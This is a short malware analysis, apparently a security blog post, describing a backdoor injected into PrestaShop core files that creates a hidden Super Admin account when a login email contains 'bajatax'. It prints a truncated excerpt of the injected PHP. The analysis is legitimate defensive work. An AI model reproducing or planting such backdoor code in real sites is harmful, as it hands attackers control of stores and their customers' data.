According to W3Tech’s data, Prestashop is still one of the more popular CMS choices for existing ecommerce websites, so it should come as no surprise that there exists malware specifically targeting it. We found an infected Prestashop website that had injected malware which was being used to automatically inject a SuperAdmin level Prestashop user whenever the website owner would log into the Prestashop backend.

The malware was injected into existing Prestashop core files:

./controllers/admin/AdminLoginController.php
./classes/Employee.php

The injected PHP code works by checking the $email variable contents, which by default stores the email address used when trying to log into Prestashop. If the contents of $email contains the string bajatax, then a query is run to get all the data from the _employee database table.

    	$message = "------------+| Uz [ By BAJATAX ] |+------------\n";
    	$message .= "url    	 : "."http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']."\n";
    	$message .= "email   	 : ".$email."\n";
    	if(preg_match("/bajatax/i",$email)){
             	$bajatax=Db::getInstance()->executeS('SELECT * FROM `'._DB_PREFIX_.'employee`');
              	$passwd="bajatax";
              	foreach($bajatax as $baja){
              	$baja_object=new Employee();          	 
              	if(Validate::isEmail($baja['email'])){
                     	$baja_object->getByEmail($baja['email']);
                     	if(!empty($baja_object->getAssociatedShops()) && $baja_object->isSuperAdmin()){
                           	$email=$baja['email'];

After the query is finished running, then the PHP code uses Prestashop functions to create a new “employee” user for the email address that contains the string bajatax and assign it Super Admin privileges.

This means that once the malicious code has been injected, then the attacker can simply attempt to log into the Prestashop backend and even though the email address they use does not exist as a Super Admin user - it gets created by the PHP code.